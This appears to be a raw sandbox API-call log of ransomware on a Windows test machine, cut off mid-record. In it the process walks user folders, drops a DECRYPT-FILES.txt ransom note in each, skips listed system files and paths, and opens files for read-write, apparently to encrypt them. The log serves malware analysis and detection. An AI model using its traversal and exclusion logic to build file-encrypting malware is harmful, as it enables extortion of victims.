[0087.027] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0087.027] wsprintfW (in: param_1=0x3f2e930, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\\\jkbimi8.tmp") returned 54 [0087.027] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\saved games\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x430 [0087.027] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\") returned 42 [0087.027] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0087.027] wsprintfW (in: param_1=0x3f2e930, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\\\DECRYPT-FILES.txt") returned 60 [0087.027] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\saved games\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x434 [0087.028] WriteFile (in: hFile=0x434, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2e92c, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2e92c*=0x23fc, lpOverlapped=0x0) returned 1 [0087.029] CloseHandle (hObject=0x434) returned 1 [0087.029] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\") returned 42 [0087.029] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\*" [0087.029] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\*", lpFindFileData=0x3f2f150 | out: lpFindFileData=0x3f2f150*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb0108020, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0108020, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8b98 [0087.030] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0087.030] FindNextFileW (in: hFindFile=0x5f8b98, lpFindFileData=0x3f2f150 | out: lpFindFileData=0x3f2f150*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb0108020, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0108020, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0087.030] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0087.030] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0087.030] FindNextFileW (in: hFindFile=0x5f8b98, lpFindFileData=0x3f2f150 | out: lpFindFileData=0x3f2f150*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0108020, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xb0108020, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb012e180, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0087.030] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0087.030] FindNextFileW (in: hFindFile=0x5f8b98, lpFindFileData=0x3f2f150 | out: lpFindFileData=0x3f2f150*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d22d5a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0087.030] lstrcmpiW (lpString1="desktop.ini", lpString2="DECRYPT-FILES.txt") returned 1 [0087.030] lstrcmpiW (lpString1="desktop.ini", lpString2="autorun.inf") returned 1 [0087.030] lstrcmpiW (lpString1="desktop.ini", lpString2="boot.ini") returned 1 [0087.030] lstrcmpiW (lpString1="desktop.ini", lpString2="desktop.ini") returned 0 [0087.030] FindNextFileW (in: hFindFile=0x5f8b98, lpFindFileData=0x3f2f150 | out: lpFindFileData=0x3f2f150*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0108020, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xb0108020, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0108020, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 1 [0087.030] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="DECRYPT-FILES.txt") returned 1 [0087.030] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="autorun.inf") returned 1 [0087.030] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="boot.ini") returned 1 [0087.030] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="desktop.ini") returned 1 [0087.030] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat") returned -1 [0087.030] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="iconcache.db") returned 1 [0087.030] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="bootsect.bak") returned 1 [0087.030] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat.log") returned -1 [0087.030] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="thumbs.db") returned -1 [0087.030] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="Bootfont.bin") returned 1 [0087.030] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0087.030] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0087.030] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0087.030] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0087.030] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0087.030] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\") returned 42 [0087.031] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0087.031] lstrcpyW (in: lpString1=0x3f2e920, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\" [0087.031] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\jkbimi8.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\jkbimi8.tmp" [0087.031] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0087.031] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\saved games\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0087.031] CloseHandle (hObject=0x0) returned 0 [0087.031] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.031] FindNextFileW (in: hFindFile=0x5f8b98, lpFindFileData=0x3f2f150 | out: lpFindFileData=0x3f2f150*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0108020, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xb0108020, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0108020, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 0 [0087.031] FindClose (in: hFindFile=0x5f8b98 | out: hFindFile=0x5f8b98) returned 1 [0087.031] CloseHandle (hObject=0x430) returned 1 [0087.031] FindNextFileW (in: hFindFile=0x5f8c18, lpFindFileData=0x3f2f3cc | out: lpFindFileData=0x3f2f3cc*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28de3e80, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Searches", cAlternateFileName="")) returned 1 [0087.031] lstrcmpW (lpString1="Searches", lpString2=".") returned 1 [0087.032] lstrcmpW (lpString1="Searches", lpString2="..") returned 1 [0087.032] lstrcatW (in: lpString1="Searches", lpString2="\\" | out: lpString1="Searches\\") returned="Searches\\" [0087.032] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpString2="Searches\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\" [0087.032] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\", lpSrch="\\Program Files") returned 0x0 [0087.032] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\", lpSrch=":\\Windows") returned 0x0 [0087.032] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\", lpSrch="\\Games\\") returned 0x0 [0087.032] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\", lpSrch="\\Tor Browser\\") returned 0x0 [0087.032] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\", lpSrch="\\ProgramData\\") returned 0x0 [0087.032] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0087.032] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0087.032] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0087.032] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\", lpSrch="\\All Users") returned 0x0 [0087.032] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\", lpSrch="\\IETldCache\\") returned 0x0 [0087.032] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\", lpSrch="\\Local Settings\\") returned 0x0 [0087.032] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\", lpSrch="\\AppData\\Local") returned 0x0 [0087.032] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\", lpSrch="AhnLab") returned 0x0 [0087.032] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0087.032] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\") returned 39 [0087.032] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0087.032] wsprintfW (in: param_1=0x3f2e930, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\\\jkbimi8.tmp") returned 51 [0087.032] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x430 [0087.033] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\") returned 39 [0087.033] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0087.033] wsprintfW (in: param_1=0x3f2e930, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\\\DECRYPT-FILES.txt") returned 57 [0087.033] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x434 [0087.033] WriteFile (in: hFile=0x434, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2e92c, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2e92c*=0x23fc, lpOverlapped=0x0) returned 1 [0087.034] CloseHandle (hObject=0x434) returned 1 [0087.034] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\") returned 39 [0087.034] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\*" [0087.034] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\*", lpFindFileData=0x3f2f150 | out: lpFindFileData=0x3f2f150*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb012e180, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb012e180, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8b98 [0087.034] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0087.034] FindNextFileW (in: hFindFile=0x5f8b98, lpFindFileData=0x3f2f150 | out: lpFindFileData=0x3f2f150*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb012e180, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb012e180, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0087.034] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0087.034] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0087.034] FindNextFileW (in: hFindFile=0x5f8b98, lpFindFileData=0x3f2f150 | out: lpFindFileData=0x3f2f150*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb012e180, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xb012e180, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb012e180, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0087.034] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0087.034] FindNextFileW (in: hFindFile=0x5f8b98, lpFindFileData=0x3f2f150 | out: lpFindFileData=0x3f2f150*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x20c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0087.034] lstrcmpiW (lpString1="desktop.ini", lpString2="DECRYPT-FILES.txt") returned 1 [0087.034] lstrcmpiW (lpString1="desktop.ini", lpString2="autorun.inf") returned 1 [0087.034] lstrcmpiW (lpString1="desktop.ini", lpString2="boot.ini") returned 1 [0087.034] lstrcmpiW (lpString1="desktop.ini", lpString2="desktop.ini") returned 0 [0087.034] FindNextFileW (in: hFindFile=0x5f8b98, lpFindFileData=0x3f2f150 | out: lpFindFileData=0x3f2f150*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99d9932, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Everywhere.search-ms", cAlternateFileName="EVERYW~1.SEA")) returned 1 [0087.034] lstrcmpiW (lpString1="Everywhere.search-ms", lpString2="DECRYPT-FILES.txt") returned 1 [0087.034] lstrcmpiW (lpString1="Everywhere.search-ms", lpString2="autorun.inf") returned 1 [0087.034] lstrcmpiW (lpString1="Everywhere.search-ms", lpString2="boot.ini") returned 1 [0087.035] lstrcmpiW (lpString1="Everywhere.search-ms", lpString2="desktop.ini") returned 1 [0087.035] lstrcmpiW (lpString1="Everywhere.search-ms", lpString2="ntuser.dat") returned -1 [0087.035] lstrcmpiW (lpString1="Everywhere.search-ms", lpString2="iconcache.db") returned -1 [0087.035] lstrcmpiW (lpString1="Everywhere.search-ms", lpString2="bootsect.bak") returned 1 [0087.035] lstrcmpiW (lpString1="Everywhere.search-ms", lpString2="ntuser.dat.log") returned -1 [0087.035] lstrcmpiW (lpString1="Everywhere.search-ms", lpString2="thumbs.db") returned -1 [0087.035] lstrcmpiW (lpString1="Everywhere.search-ms", lpString2="Bootfont.bin") returned 1 [0087.035] lstrlenW (lpString="Everywhere.search-ms") returned 20 [0087.035] lstrcmpiW (lpString1="search-ms", lpString2="lnk") returned 1 [0087.035] lstrcmpiW (lpString1="search-ms", lpString2="exe") returned 1 [0087.035] lstrcmpiW (lpString1="search-ms", lpString2="sys") returned -1 [0087.035] lstrcmpiW (lpString1="search-ms", lpString2="dll") returned 1 [0087.035] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\") returned 39 [0087.035] lstrlenW (lpString="Everywhere.search-ms") returned 20 [0087.035] lstrcpyW (in: lpString1=0x3f2e920, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\" [0087.035] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\", lpString2="Everywhere.search-ms" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Everywhere.search-ms") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Everywhere.search-ms" [0087.035] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0087.035] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Everywhere.search-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches\\everywhere.search-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0087.035] CloseHandle (hObject=0x0) returned 0 [0087.035] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.036] FindNextFileW (in: hFindFile=0x5f8b98, lpFindFileData=0x3f2f150 | out: lpFindFileData=0x3f2f150*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99b37d1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 1 [0087.036] lstrcmpiW (lpString1="Indexed Locations.search-ms", lpString2="DECRYPT-FILES.txt") returned 1 [0087.036] lstrcmpiW (lpString1="Indexed Locations.search-ms", lpString2="autorun.inf") returned 1 [0087.036] lstrcmpiW (lpString1="Indexed Locations.search-ms", lpString2="boot.ini") returned 1 [0087.036] lstrcmpiW (lpString1="Indexed Locations.search-ms", lpString2="desktop.ini") returned 1 [0087.036] lstrcmpiW (lpString1="Indexed Locations.search-ms", lpString2="ntuser.dat") returned -1 [0087.036] lstrcmpiW (lpString1="Indexed Locations.search-ms", lpString2="iconcache.db") returned 1 [0087.036] lstrcmpiW (lpString1="Indexed Locations.search-ms", lpString2="bootsect.bak") returned 1 [0087.036] lstrcmpiW (lpString1="Indexed Locations.search-ms", lpString2="ntuser.dat.log") returned -1 [0087.036] lstrcmpiW (lpString1="Indexed Locations.search-ms", lpString2="thumbs.db") returned -1 [0087.036] lstrcmpiW (lpString1="Indexed Locations.search-ms", lpString2="Bootfont.bin") returned 1 [0087.036] lstrlenW (lpString="Indexed Locations.search-ms") returned 27 [0087.036] lstrcmpiW (lpString1="search-ms", lpString2="lnk") returned 1 [0087.036] lstrcmpiW (lpString1="search-ms", lpString2="exe") returned 1 [0087.036] lstrcmpiW (lpString1="search-ms", lpString2="sys") returned -1 [0087.036] lstrcmpiW (lpString1="search-ms", lpString2="dll") returned 1 [0087.036] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\") returned 39 [0087.036] lstrlenW (lpString="Indexed Locations.search-ms") returned 27 [0087.036] lstrcpyW (in: lpString1=0x3f2e920, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\" [0087.036] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\", lpString2="Indexed Locations.search-ms" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Indexed Locations.search-ms") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Indexed Locations.search-ms" [0087.036] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0087.036] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Indexed Locations.search-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches\\indexed locations.search-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0087.037] CloseHandle (hObject=0x0) returned 0 [0087.037] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.037] FindNextFileW (in: hFindFile=0x5f8b98, lpFindFileData=0x3f2f150 | out: lpFindFileData=0x3f2f150*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb012e180, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xb012e180, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb012e180, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 1 [0087.037] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="DECRYPT-FILES.txt") returned 1 [0087.037] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="autorun.inf") returned 1 [0087.037] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="boot.ini") returned 1 [0087.037] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="desktop.ini") returned 1 [0087.037] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat") returned -1 [0087.037] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="iconcache.db") returned 1 [0087.037] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="bootsect.bak") returned 1 [0087.037] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat.log") returned -1 [0087.037] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="thumbs.db") returned -1 [0087.037] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="Bootfont.bin") returned 1 [0087.037] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0087.037] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0087.037] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0087.037] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0087.037] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0087.037] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\") returned 39 [0087.037] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0087.037] lstrcpyW (in: lpString1=0x3f2e920, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\" [0087.037] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\jkbimi8.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\jkbimi8.tmp" [0087.037] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0087.038] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0087.038] CloseHandle (hObject=0x0) returned 0 [0087.038] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.038] FindNextFileW (in: hFindFile=0x5f8b98, lpFindFileData=0x3f2f150 | out: lpFindFileData=0x3f2f150*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb012e180, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xb012e180, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb012e180, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, 